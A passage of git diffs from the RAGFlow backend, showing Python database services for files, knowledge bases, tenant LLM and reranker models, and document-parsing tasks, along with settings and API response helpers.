# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask_login import current_user
|
||||
from peewee import fn
|
||||
|
||||
from api.db import FileType, KNOWLEDGEBASE_FOLDER_NAME, FileSource
|
||||
from api.db.db_models import DB, File2Document, Knowledgebase
|
||||
from api.db.db_models import File, Document
|
||||
from api.db.services.common_service import CommonService
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.utils import get_uuid
|
||||
|
||||
|
||||
class FileService(CommonService):
|
||||
model = File
|
||||
|
||||
@classmethod
|
||||
@DB.connection_context()
|
||||
def get_by_pf_id(cls, tenant_id, pf_id, page_number, items_per_page,
|
||||
orderby, desc, keywords):
|
||||
if keywords:
|
||||
files = cls.model.select().where(
|
||||
(cls.model.tenant_id == tenant_id),
|
||||
(cls.model.parent_id == pf_id),
|
||||
(fn.LOWER(cls.model.name).contains(keywords.lower())),
|
||||
~(cls.model.id == pf_id)
|
||||
)
|
||||
else:
|
||||
files = cls.model.select().where((cls.model.tenant_id == tenant_id),
|
||||
                (cls.model.parent_id == pf_id),
                ~(cls.model.id == pf_id)
            )
        count = files.count()
        if desc:
            files = files.order_by(cls.model.getter_by(orderby).desc())
        else:
            files = files.order_by(cls.model.getter_by(orderby).asc())

        files = files.paginate(page_number, items_per_page)

        res_files = list(files.dicts())
        for file in res_files:
            if file["type"] == FileType.FOLDER.value:
                file["size"] = cls.get_folder_size(file["id"])
                file['kbs_info'] = []
                continue
            kbs_info = cls.get_kb_id_by_file_id(file['id'])
            file['kbs_info'] = kbs_info

        return res_files, count

    @classmethod
    @DB.connection_context()
    def get_kb_id_by_file_id(cls, file_id):
        kbs = (cls.model.select(*[Knowledgebase.id, Knowledgebase.name])
               .join(File2Document, on=(File2Document.file_id == file_id))
               .join(Document, on=(File2Document.document_id == Document.id))
               .join(Knowledgebase, on=(Knowledgebase.id == Document.kb_id))
               .where(cls.model.id == file_id))
        if not kbs: return []
        kbs_info_list = []
        for kb in list(kbs.dicts()):
            kbs_info_list.append({"kb_id": kb['id'], "kb_name": kb['name']})
        return kbs_info_list

    @classmethod
    @DB.connection_context()
    def get_by_pf_id_name(cls, id, name):
        file = cls.model.select().where((cls.model.parent_id == id) & (cls.model.name == name))
        if file.count():
            e, file = cls.get_by_id(file[0].id)
            if not e:
                raise RuntimeError("Database error (File retrieval)!")
            return file
        return None

    @classmethod
    @DB.connection_context()
    def get_id_list_by_id(cls, id, name, count, res):
        if count < len(name):
            file = cls.get_by_pf_id_name(id, name[count])
            if file:
                res.append(file.id)
                return cls.get_id_list_by_id(file.id, name, count + 1, res)
            else:
                return res
        else:
            return res

    @classmethod
    @DB.connection_context()
    def get_all_innermost_file_ids(cls, folder_id, result_ids):
        subfolders = cls.model.select().where(cls.model.parent_id == folder_id)
        if subfolders.exists():
            for subfolder in subfolders:
                cls.get_all_innermost_file_ids(subfolder.id, result_ids)
        else:
            result_ids.append(folder_id)
        return result_ids

    @classmethod
    @DB.connection_context()
    def create_folder(cls, file, parent_id, name, count):
        if count > len(name) - 2:
            return file
        else:
            file = cls.insert({
                "id": get_uuid(),
                "parent_id": parent_id,
                "tenant_id": current_user.id,
                "created_by": current_user.id,
                "name": name[count],
                "location": "",
                "size": 0,
                "type": FileType.FOLDER.value
            })
            return cls.create_folder(file, file.id, name, count + 1)

    @classmethod
    @DB.connection_context()
    def is_parent_folder_exist(cls, parent_id):
        parent_files = cls.model.select().where(cls.model.id == parent_id)
        if parent_files.count():
            return True
        cls.delete_folder_by_pf_id(parent_id)
        return False

    @classmethod
    @DB.connection_context()
    def get_root_folder(cls, tenant_id):
        for file in cls.model.select().where((cls.model.tenant_id == tenant_id),
                                             (cls.model.parent_id == cls.model.id)
                                             ):
            return file.to_dict()

        file_id = get_uuid()
        file = {
            "id": file_id,
            "parent_id": file_id,
            "tenant_id": tenant_id,
            "created_by": tenant_id,
            "name": "/",
            "type": FileType.FOLDER.value,
            "size": 0,
            "location": "",
        }
        cls.save(**file)
        return file

    @classmethod
    @DB.connection_context()
    def get_kb_folder(cls, tenant_id):
        for root in cls.model.select().where(
                (cls.model.tenant_id == tenant_id), (cls.model.parent_id == cls.model.id)):
            for folder in cls.model.select().where(
                    (cls.model.tenant_id == tenant_id), (cls.model.parent_id == root.id),
                    (cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)):
                return folder.to_dict()
        assert False, "Can't find the KB folder. Database init error."

    @classmethod
    @DB.connection_context()
    def new_a_file_from_kb(cls, tenant_id, name, parent_id, ty=FileType.FOLDER.value, size=0, location=""):
        for file in cls.query(tenant_id=tenant_id, parent_id=parent_id, name=name):
            return file.to_dict()
        file = {
            "id": get_uuid(),
            "parent_id": parent_id,
            "tenant_id": tenant_id,
            "created_by": tenant_id,
            "name": name,
            "type": ty,
            "size": size,
            "location": location,
            "source_type": FileSource.KNOWLEDGEBASE
        }
        cls.save(**file)
        return file

    @classmethod
    @DB.connection_context()
    def init_knowledgebase_docs(cls, root_id, tenant_id):
        for _ in cls.model.select().where((cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)\
                                          & (cls.model.parent_id == root_id)):
            return
        folder = cls.new_a_file_from_kb(tenant_id, KNOWLEDGEBASE_FOLDER_NAME, root_id)

        for kb in Knowledgebase.select(*[Knowledgebase.id, Knowledgebase.name]).where(Knowledgebase.tenant_id==tenant_id):
            kb_folder = cls.new_a_file_from_kb(tenant_id, kb.name, folder["id"])
            for doc in DocumentService.query(kb_id=kb.id):
                FileService.add_file_from_kb(doc.to_dict(), kb_folder["id"], tenant_id)

    @classmethod
    @DB.connection_context()
    def get_parent_folder(cls, file_id):
        file = cls.model.select().where(cls.model.id == file_id)
        if file.count():
            e, file = cls.get_by_id(file[0].parent_id)
            if not e:
                raise RuntimeError("Database error (File retrieval)!")
        else:
            raise RuntimeError("Database error (File doesn't exist)!")
        return file

    @classmethod
    @DB.connection_context()
    def get_all_parent_folders(cls, start_id):
        parent_folders = []
        current_id = start_id
        while current_id:
            e, file = cls.get_by_id(current_id)
            if file.parent_id != file.id and e:
                parent_folders.append(file)
                current_id = file.parent_id
            else:
                parent_folders.append(file)
                break
        return parent_folders

    @classmethod
    @DB.connection_context()
    def insert(cls, file):
        if not cls.save(**file):
            raise RuntimeError("Database error (File)!")
        e, file = cls.get_by_id(file["id"])
        if not e:
            raise RuntimeError("Database error (File retrieval)!")
        return file

    @classmethod
    @DB.connection_context()
    def delete(cls, file):
        return cls.delete_by_id(file.id)

    @classmethod
    @DB.connection_context()
    def delete_by_pf_id(cls, folder_id):
        return cls.model.delete().where(cls.model.parent_id == folder_id).execute()

    @classmethod
    @DB.connection_context()
    def delete_folder_by_pf_id(cls, user_id, folder_id):
        try:
            files = cls.model.select().where((cls.model.tenant_id == user_id)
                                             & (cls.model.parent_id == folder_id))
            for file in files:
                cls.delete_folder_by_pf_id(user_id, file.id)
            return cls.model.delete().where((cls.model.tenant_id == user_id)
                                            & (cls.model.id == folder_id)).execute()
        except Exception as e:
            print(e)
            raise RuntimeError("Database error (File retrieval)!")

    @classmethod
    @DB.connection_context()
    def get_file_count(cls, tenant_id):
        files = cls.model.select(cls.model.id).where(cls.model.tenant_id == tenant_id)
        return len(files)

    @classmethod
    @DB.connection_context()
    def get_folder_size(cls, folder_id):
        size = 0

        def dfs(parent_id):
            nonlocal size
            for f in cls.model.select(*[cls.model.id, cls.model.size, cls.model.type]).where(
                    cls.model.parent_id == parent_id, cls.model.id != parent_id):
                size += f.size
                if f.type == FileType.FOLDER.value:
                    dfs(f.id)

        dfs(folder_id)
        return size

    @classmethod
    @DB.connection_context()
    def add_file_from_kb(cls, doc, kb_folder_id, tenant_id):
        for _ in File2DocumentService.get_by_document_id(doc["id"]): return
        file = {
            "id": get_uuid(),
            "parent_id": kb_folder_id,
            "tenant_id": tenant_id,
            "created_by": tenant_id,
            "name": doc["name"],
            "type": doc["type"],
            "size": doc["size"],
            "location": doc["location"],
            "source_type": FileSource.KNOWLEDGEBASE
        }
        cls.save(**file)
        File2DocumentService.save(**{"id": get_uuid(), "file_id": file["id"], "document_id": doc["id"]})

    @classmethod
    @DB.connection_context()
    def move_file(cls, file_ids, folder_id):
        try:
            cls.filter_update((cls.model.id << file_ids, ), {'parent_id': folder_id})
        except Exception as e:
            print(e)
            raise RuntimeError("Database error (File move)!")
@@ -1,67 +0,0 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from api.db import TenantPermission
from api.db.db_models import DB, Tenant
from api.db.db_models import Knowledgebase
from api.db.services.common_service import CommonService
from api.db import StatusEnum


class KnowledgebaseService(CommonService):
    model = Knowledgebase

    @classmethod
    @DB.connection_context()
    def get_by_tenant_ids(cls, joined_tenant_ids, user_id,
                          page_number, items_per_page, orderby, desc):
        kbs = cls.model.select().where(
            ((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
                                                            TenantPermission.TEAM.value)) | (cls.model.tenant_id == user_id))
            & (cls.model.status == StatusEnum.VALID.value)
        )
        if desc:
            kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
        else:
            kbs = kbs.order_by(cls.model.getter_by(orderby).asc())

        kbs = kbs.paginate(page_number, items_per_page)

        return list(kbs.dicts())

    @classmethod
    @DB.connection_context()
    def get_detail(cls, kb_id):
        fields = [
            cls.model.id,
            Tenant.embd_id,
            cls.model.avatar,
            cls.model.name,
            cls.model.description,
            cls.model.permission,
            cls.model.doc_num,
            cls.model.token_num,
            cls.model.chunk_num,
            cls.model.parser_id]
        kbs = cls.model.select(*fields).join(Tenant, on=((Tenant.id == cls.model.tenant_id)&(Tenant.status== StatusEnum.VALID.value))).where(
            (cls.model.id == kb_id),
            (cls.model.status == StatusEnum.VALID.value)
        )
        if not kbs:
            return
        d = kbs[0].to_dict()
        d["embd_id"] = kbs[0].tenant.embd_id
        return d
@@ -27,7 +27,8 @@ class KnowledgebaseService(CommonService):
                          page_number, items_per_page, orderby, desc):
        kbs = cls.model.select().where(
            ((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
                                                            TenantPermission.TEAM.value)) | (cls.model.tenant_id == user_id))
                                                            TenantPermission.TEAM.value)) | (
                cls.model.tenant_id == user_id))
            & (cls.model.status == StatusEnum.VALID.value)
        )
        if desc:
@@ -39,6 +40,31 @@ class KnowledgebaseService(CommonService):

        return list(kbs.dicts())

    @classmethod
    @DB.connection_context()
    def get_by_tenant_ids_by_offset(cls, joined_tenant_ids, user_id, offset, count, orderby, desc):
        kbs = cls.model.select().where(
            ((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
                                                            TenantPermission.TEAM.value)) | (
                cls.model.tenant_id == user_id))
            & (cls.model.status == StatusEnum.VALID.value)
        )
        if desc:
            kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
        else:
            kbs = kbs.order_by(cls.model.getter_by(orderby).asc())

        kbs = list(kbs.dicts())

        kbs_length = len(kbs)
        if offset < 0 or offset > kbs_length:
            raise IndexError("Offset is out of the valid range.")

        if count == -1:
            return kbs[offset:]

        return kbs[offset:offset + count]

    @classmethod
    @DB.connection_context()
    def get_detail(cls, kb_id):
@@ -56,7 +82,8 @@ class KnowledgebaseService(CommonService):
            cls.model.chunk_num,
            cls.model.parser_id,
            cls.model.parser_config]
        kbs = cls.model.select(*fields).join(Tenant, on=((Tenant.id == cls.model.tenant_id) & (Tenant.status == StatusEnum.VALID.value))).where(
        kbs = cls.model.select(*fields).join(Tenant, on=(
            (Tenant.id == cls.model.tenant_id) & (Tenant.status == StatusEnum.VALID.value))).where(
            (cls.model.id == kb_id),
            (cls.model.status == StatusEnum.VALID.value)
        )
@@ -86,6 +113,7 @@ class KnowledgebaseService(CommonService):
                    old[k] = list(set(old[k] + v))
                else:
                    old[k] = v

        dfs_update(m.parser_config, config)
        cls.update_by_id(id, {"parser_config": m.parser_config})

@@ -97,3 +125,20 @@ class KnowledgebaseService(CommonService):
            if k.parser_config and "field_map" in k.parser_config:
                conf.update(k.parser_config["field_map"])
        return conf

    @classmethod
    @DB.connection_context()
    def get_by_name(cls, kb_name, tenant_id):
        kb = cls.model.select().where(
            (cls.model.name == kb_name)
            & (cls.model.tenant_id == tenant_id)
            & (cls.model.status == StatusEnum.VALID.value)
        )
        if kb:
            return True, kb[0]
        return False, None

    @classmethod
    @DB.connection_context()
    def get_all_ids(cls):
        return [m["id"] for m in cls.model.select(cls.model.id).dicts()]

@@ -15,7 +15,7 @@
#
from api.db.services.user_service import TenantService
from api.settings import database_logger
from rag.llm import EmbeddingModel, CvModel, ChatModel
from rag.llm import EmbeddingModel, CvModel, ChatModel, RerankModel
from api.db import LLMType
from api.db.db_models import DB, UserTenant
from api.db.db_models import LLMFactories, LLM, TenantLLM
@@ -73,21 +73,25 @@ class TenantLLMService(CommonService):
            mdlnm = tenant.img2txt_id
        elif llm_type == LLMType.CHAT.value:
            mdlnm = tenant.llm_id if not llm_name else llm_name
        elif llm_type == LLMType.RERANK:
            mdlnm = tenant.rerank_id if not llm_name else llm_name
        else:
            assert False, "LLM type error"

        model_config = cls.get_api_key(tenant_id, mdlnm)
        if model_config: model_config = model_config.to_dict()
        if not model_config:
            if llm_type == LLMType.EMBEDDING.value:
                llm = LLMService.query(llm_name=llm_name)
                if llm and llm[0].fid in ["QAnything", "FastEmbed"]:
                    model_config = {"llm_factory": llm[0].fid, "api_key": "", "llm_name": llm_name, "api_base": ""}
            if llm_type in [LLMType.EMBEDDING, LLMType.RERANK]:
                llm = LLMService.query(llm_name=llm_name if llm_name else mdlnm)
                if llm and llm[0].fid in ["Youdao", "FastEmbed", "BAAI"]:
                    model_config = {"llm_factory": llm[0].fid, "api_key": "", "llm_name": llm_name if llm_name else mdlnm, "api_base": ""}
            if not model_config:
                if llm_name == "flag-embedding":
                    model_config = {"llm_factory": "Tongyi-Qianwen", "api_key": "",
                                    "llm_name": llm_name, "api_base": ""}
                else:
                    if not mdlnm:
                        raise LookupError(f"Type of {llm_type} model is not set.")
                    raise LookupError("Model({}) not authorized".format(mdlnm))

        if llm_type == LLMType.EMBEDDING.value:
@@ -96,6 +100,12 @@ class TenantLLMService(CommonService):
            return EmbeddingModel[model_config["llm_factory"]](
                model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])

        if llm_type == LLMType.RERANK:
            if model_config["llm_factory"] not in RerankModel:
                return
            return RerankModel[model_config["llm_factory"]](
                model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])

        if llm_type == LLMType.IMAGE2TEXT.value:
            if model_config["llm_factory"] not in CvModel:
                return
@@ -125,14 +135,31 @@ class TenantLLMService(CommonService):
            mdlnm = tenant.img2txt_id
        elif llm_type == LLMType.CHAT.value:
            mdlnm = tenant.llm_id if not llm_name else llm_name
        elif llm_type == LLMType.RERANK:
            mdlnm = tenant.llm_id if not llm_name else llm_name
        else:
            assert False, "LLM type error"

        num = cls.model.update(used_tokens=cls.model.used_tokens + used_tokens)\
        num = 0
        try:
            for u in cls.query(tenant_id=tenant_id, llm_name=mdlnm):
                num += cls.model.update(used_tokens=u.used_tokens + used_tokens)\
                    .where(cls.model.tenant_id == tenant_id, cls.model.llm_name == mdlnm)\
                    .execute()
        except Exception as e:
            pass
        return num

    @classmethod
    @DB.connection_context()
    def get_openai_models(cls):
        objs = cls.model.select().where(
            (cls.model.llm_factory == "OpenAI"),
            ~(cls.model.llm_name == "text-embedding-3-small"),
            ~(cls.model.llm_name == "text-embedding-3-large")
        ).dicts()
        return list(objs)


class LLMBundle(object):
    def __init__(self, tenant_id, llm_type, llm_name=None, lang="Chinese"):
@@ -143,6 +170,10 @@ class LLMBundle(object):
            tenant_id, llm_type, llm_name, lang=lang)
        assert self.mdl, "Can't find model for {}/{}/{}".format(
            tenant_id, llm_type, llm_name)
        self.max_length = 512
        for lm in LLMService.query(llm_name=llm_name):
            self.max_length = lm.max_tokens
            break

    def encode(self, texts: list, batch_size=32):
        emd, used_tokens = self.mdl.encode(texts, batch_size)
@@ -160,6 +191,14 @@ class LLMBundle(object):
                "Can't update token usage for {}/EMBEDDING".format(self.tenant_id))
        return emd, used_tokens

    def similarity(self, query: str, texts: list):
        sim, used_tokens = self.mdl.similarity(query, texts)
        if not TenantLLMService.increase_usage(
                self.tenant_id, self.llm_type, used_tokens):
            database_logger.error(
                "Can't update token usage for {}/RERANK".format(self.tenant_id))
        return sim, used_tokens

    def describe(self, image, max_tokens=300):
        txt, used_tokens = self.mdl.describe(image, max_tokens)
        if not TenantLLMService.increase_usage(
@@ -170,8 +209,18 @@ class LLMBundle(object):

    def chat(self, system, history, gen_conf):
        txt, used_tokens = self.mdl.chat(system, history, gen_conf)
        if TenantLLMService.increase_usage(
        if not TenantLLMService.increase_usage(
                self.tenant_id, self.llm_type, used_tokens, self.llm_name):
            database_logger.error(
                "Can't update token usage for {}/CHAT".format(self.tenant_id))
        return txt

    def chat_streamly(self, system, history, gen_conf):
        for txt in self.mdl.chat_streamly(system, history, gen_conf):
            if isinstance(txt, int):
                if not TenantLLMService.increase_usage(
                        self.tenant_id, self.llm_type, txt, self.llm_name):
                    database_logger.error(
                        "Can't update token usage for {}/CHAT".format(self.tenant_id))
                return
            yield txt

@@ -13,12 +13,22 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
from peewee import Expression
from api.db.db_models import DB
import os
import random

from api.db.db_utils import bulk_insert_into_db
from deepdoc.parser import PdfParser
from peewee import JOIN
from api.db.db_models import DB, File2Document, File
from api.db import StatusEnum, FileType, TaskStatus
from api.db.db_models import Task, Document, Knowledgebase, Tenant
from api.db.services.common_service import CommonService
from api.db.services.document_service import DocumentService
from api.utils import current_timestamp, get_uuid
from deepdoc.parser.excel_parser import RAGFlowExcelParser
from rag.settings import SVR_QUEUE_NAME
from rag.utils.minio_conn import MINIO
from rag.utils.redis_conn import REDIS_CONN


class TaskService(CommonService):
@@ -26,7 +36,7 @@ class TaskService(CommonService):

    @classmethod
    @DB.connection_context()
    def get_tasks(cls, tm, mod=0, comm=1, items_per_page=64):
    def get_tasks(cls, task_id):
        fields = [
            cls.model.id,
            cls.model.doc_id,
@@ -44,21 +54,40 @@ class TaskService(CommonService):
            Knowledgebase.embd_id,
            Tenant.img2txt_id,
            Tenant.asr_id,
            Tenant.llm_id,
            cls.model.update_time]
        docs = cls.model.select(*fields) \
            .join(Document, on=(cls.model.doc_id == Document.id)) \
            .join(Knowledgebase, on=(Document.kb_id == Knowledgebase.id)) \
            .join(Tenant, on=(Knowledgebase.tenant_id == Tenant.id))\
            .join(Tenant, on=(Knowledgebase.tenant_id == Tenant.id)) \
            .where(cls.model.id == task_id)
        docs = list(docs.dicts())
        if not docs: return []

        cls.model.update(progress_msg=cls.model.progress_msg + "\n" + "Task has been received.",
                         progress=random.random() / 10.).where(
            cls.model.id == docs[0]["id"]).execute()
        return docs

    @classmethod
    @DB.connection_context()
    def get_ongoing_doc_name(cls):
        with DB.lock("get_task", -1):
            docs = cls.model.select(*[Document.id, Document.kb_id, Document.location, File.parent_id]) \
                .join(Document, on=(cls.model.doc_id == Document.id)) \
                .join(File2Document, on=(File2Document.document_id == Document.id), join_type=JOIN.LEFT_OUTER) \
                .join(File, on=(File2Document.file_id == File.id), join_type=JOIN.LEFT_OUTER) \
                .where(
                    Document.status == StatusEnum.VALID.value,
                    Document.run == TaskStatus.RUNNING.value,
                    ~(Document.type == FileType.VIRTUAL.value),
                    cls.model.progress == 0,
                    cls.model.update_time >= tm,
                    (Expression(cls.model.create_time, "%%", comm) == mod))\
                .order_by(cls.model.update_time.asc())\
                .paginate(1, items_per_page)
        return list(docs.dicts())
                    cls.model.progress < 1,
                    cls.model.create_time >= current_timestamp() - 1000 * 600
                )
            docs = list(docs.dicts())
            if not docs: return []

            return list(set([(d["parent_id"] if d["parent_id"] else d["kb_id"], d["location"]) for d in docs]))

    @classmethod
    @DB.connection_context()
@@ -69,14 +98,76 @@ class TaskService(CommonService):
            return doc.run == TaskStatus.CANCEL.value or doc.progress < 0
        except Exception as e:
            pass
        return True
        return False

    @classmethod
    @DB.connection_context()
    def update_progress(cls, id, info):
        if os.environ.get("MACOS"):
            if info["progress_msg"]:
                cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
                    cls.model.id == id).execute()
            if "progress" in info:
                cls.model.update(progress=info["progress"]).where(
                    cls.model.id == id).execute()
            return

        with DB.lock("update_progress", -1):
            if info["progress_msg"]:
                cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
                    cls.model.id == id).execute()
            if "progress" in info:
                cls.model.update(progress=info["progress"]).where(
                    cls.model.id == id).execute()


def queue_tasks(doc, bucket, name):
    def new_task():
        nonlocal doc
        return {
            "id": get_uuid(),
            "doc_id": doc["id"]
        }
    tsks = []

    if doc["type"] == FileType.PDF.value:
        file_bin = MINIO.get(bucket, name)
        do_layout = doc["parser_config"].get("layout_recognize", True)
        pages = PdfParser.total_page_number(doc["name"], file_bin)
        page_size = doc["parser_config"].get("task_page_size", 12)
        if doc["parser_id"] == "paper":
            page_size = doc["parser_config"].get("task_page_size", 22)
        if doc["parser_id"] == "one":
            page_size = 1000000000
        if not do_layout:
            page_size = 1000000000
        page_ranges = doc["parser_config"].get("pages")
        if not page_ranges:
            page_ranges = [(1, 100000)]
        for s, e in page_ranges:
            s -= 1
            s = max(0, s)
            e = min(e - 1, pages)
            for p in range(s, e, page_size):
                task = new_task()
                task["from_page"] = p
                task["to_page"] = min(p + page_size, e)
                tsks.append(task)

    elif doc["parser_id"] == "table":
        file_bin = MINIO.get(bucket, name)
        rn = RAGFlowExcelParser.row_number(
            doc["name"], file_bin)
        for i in range(0, rn, 3000):
            task = new_task()
            task["from_page"] = i
            task["to_page"] = min(i + 3000, rn)
            tsks.append(task)
    else:
        tsks.append(new_task())

    bulk_insert_into_db(Task, tsks, True)
    DocumentService.begin2parse(doc["id"])

    for t in tsks:
        assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=t), "Can't access Redis. Please check the Redis' status."

@@ -93,6 +93,7 @@ class TenantService(CommonService):
            cls.model.name,
            cls.model.llm_id,
            cls.model.embd_id,
            cls.model.rerank_id,
            cls.model.asr_id,
            cls.model.img2txt_id,
            cls.model.parser_ids,

@@ -18,10 +18,14 @@ import logging
import os
import signal
import sys
import time
import traceback
from concurrent.futures import ThreadPoolExecutor

from werkzeug.serving import run_simple
from api.apps import app
from api.db.runtime_config import RuntimeConfig
from api.db.services.document_service import DocumentService
from api.settings import (
    HOST, HTTP_PORT, access_logger, database_logger, stat_logger,
)
@@ -31,6 +35,16 @@ from api.db.db_models import init_database_tables as init_web_db
from api.db.init_data import init_web_data
from api.versions import get_versions


def update_progress():
    while True:
        time.sleep(1)
        try:
            DocumentService.update_progress()
        except Exception as e:
            stat_logger.error("update_progress exception:" + str(e))


if __name__ == '__main__':
    print("""
        ____ ______ __
@@ -71,6 +85,9 @@ if __name__ == '__main__':
    peewee_logger.addHandler(database_logger.handlers[0])
    peewee_logger.setLevel(database_logger.level)

    thr = ThreadPoolExecutor(max_workers=1)
    thr.submit(update_progress)

    # start http server
    try:
        stat_logger.info("RAG Flow http server start...")

@@ -32,7 +32,7 @@ access_logger = getLogger("access")
database_logger = getLogger("database")
chat_logger = getLogger("chat")

from rag.utils import ELASTICSEARCH
from rag.utils.es_conn import ELASTICSEARCH
from rag.nlp import search
from api.utils import get_base_config, decrypt_database_config

@@ -69,6 +69,12 @@ default_llm = {
        "image2text_model": "gpt-4-vision-preview",
        "asr_model": "whisper-1",
    },
    "Azure-OpenAI": {
        "chat_model": "azure-gpt-35-turbo",
        "embedding_model": "azure-text-embedding-ada-002",
        "image2text_model": "azure-gpt-4-vision-preview",
        "asr_model": "azure-whisper-1",
    },
    "ZHIPU-AI": {
        "chat_model": "glm-3-turbo",
        "embedding_model": "embedding-2",
@@ -86,6 +92,25 @@ default_llm = {
        "embedding_model": "",
        "image2text_model": "",
        "asr_model": "",
    },
    "DeepSeek": {
        "chat_model": "deepseek-chat",
        "embedding_model": "",
        "image2text_model": "",
        "asr_model": "",
    },
    "VolcEngine": {
        "chat_model": "",
        "embedding_model": "",
        "image2text_model": "",
        "asr_model": "",
    },
    "BAAI": {
        "chat_model": "",
        "embedding_model": "BAAI/bge-large-zh-v1.5",
        "image2text_model": "",
        "asr_model": "",
        "rerank_model": "BAAI/bge-reranker-v2-m3",
    }
}
LLM = get_base_config("user_default_llm", {})
@@ -98,7 +123,8 @@ if LLM_FACTORY not in default_llm:
        f"LLM factory {LLM_FACTORY} is not supported yet; switching to 'Tongyi-Qianwen/QWen' automatically. Please check the API_KEY in service_conf.yaml.")
    LLM_FACTORY = "Tongyi-Qianwen"
CHAT_MDL = default_llm[LLM_FACTORY]["chat_model"]
EMBEDDING_MDL = default_llm[LLM_FACTORY]["embedding_model"]
EMBEDDING_MDL = default_llm["BAAI"]["embedding_model"]
RERANK_MDL = default_llm["BAAI"]["rerank_model"]
ASR_MDL = default_llm[LLM_FACTORY]["asr_model"]
IMAGE2TEXT_MDL = default_llm[LLM_FACTORY]["image2text_model"]

@@ -152,6 +178,7 @@ CLIENT_AUTHENTICATION = AUTHENTICATION_CONF.get(
    "switch", False)
HTTP_APP_KEY = AUTHENTICATION_CONF.get("client", {}).get("http_app_key")
GITHUB_OAUTH = get_base_config("oauth", {}).get("github")
FEISHU_OAUTH = get_base_config("oauth", {}).get("feishu")
WECHAT_OAUTH = get_base_config("oauth", {}).get("wechat")

# site
@@ -218,4 +245,5 @@ class RetCode(IntEnum, CustomEnum):
    RUNNING = 106
    PERMISSION_ERROR = 108
    AUTHENTICATION_ERROR = 109
    UNAUTHORIZED = 401
    SERVER_ERROR = 500

@@ -25,7 +25,6 @@ from flask import (
from werkzeug.http import HTTP_STATUS_CODES

from api.utils import json_dumps
from api.versions import get_rag_version
from api.settings import RetCode
from api.settings import (
    REQUEST_MAX_WAIT_SEC, REQUEST_WAIT_SEC,
@@ -39,7 +38,6 @@ from base64 import b64encode
from hmac import HMAC
from urllib.parse import quote, urlencode


requests.models.complexjson.dumps = functools.partial(
    json.dumps, cls=CustomJSONEncoder)

@@ -84,9 +82,6 @@ def request(**kwargs):
    return sess.send(prepped, stream=stream, timeout=timeout)


rag_version = get_rag_version() or ''


def get_exponential_backoff_interval(retries, full_jitter=False):
    """Calculate the exponential backoff wait time."""
    # Will be zero if factor equals 0
@@ -149,7 +144,7 @@ def server_error_response(e):
    if len(e.args) > 1:
        return get_json_result(
            retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e.args[0]), data=e.args[1])
    if repr(e).find("index_not_found_exception") >=0:
    if repr(e).find("index_not_found_exception") >= 0:
        return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg="No chunk found, please upload file and parse it.")

    return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e))
@@ -239,3 +234,36 @@ def cors_reponse(retcode=RetCode.SUCCESS,
    response.headers["Access-Control-Allow-Headers"] = "*"
    response.headers["Access-Control-Expose-Headers"] = "Authorization"
    return response

def construct_result(code=RetCode.DATA_ERROR, message='data is missing'):
    import re
    result_dict = {"code": code, "message": re.sub(r"rag", "seceum", message, flags=re.IGNORECASE)}
    response = {}
    for key, value in result_dict.items():
        if value is None and key != "code":
            continue
        else:
            response[key] = value
    return jsonify(response)


def construct_json_result(code=RetCode.SUCCESS, message='success', data=None):
    if data is None:
        return jsonify({"code": code, "message": message})
    else:
        return jsonify({"code": code, "message": message, "data": data})


def construct_error_response(e):
    stat_logger.exception(e)
    try:
        if e.code == 401:
            return construct_json_result(code=RetCode.UNAUTHORIZED, message=repr(e))
    except BaseException:
        pass
    if len(e.args) > 1:
        return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e.args[0]), data=e.args[1])
    if repr(e).find("index_not_found_exception") >= 0:
        return construct_json_result(code=RetCode.EXCEPTION_ERROR, message="No chunk found, please upload file and parse it.")

    return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e))

@@ -19,7 +19,7 @@ import os
import re
from io import BytesIO

import fitz
import pdfplumber
from PIL import Image
from cachetools import LRUCache, cached
from ruamel.yaml import YAML
@@ -66,6 +66,15 @@ def get_rag_python_directory(*args):
    return get_rag_directory("python", *args)


def get_home_cache_dir():
    dir = os.path.join(os.path.expanduser('~'), ".ragflow")
    try:
        os.mkdir(dir)
    except OSError as error:
        pass
    return dir


@cached(cache=LRUCache(maxsize=10))
def load_json_conf(conf_path):
    if os.path.isabs(conf_path):
@@ -147,7 +156,7 @@ def filename_type(filename):
        return FileType.PDF.value

    if re.match(
            r".*\.(docx|doc|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md)$", filename):
            r".*\.(doc|docx|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md|py|js|java|c|cpp|h|php|go|ts|sh|cs|kt|html)$", filename):
        return FileType.DOC.value

    if re.match(
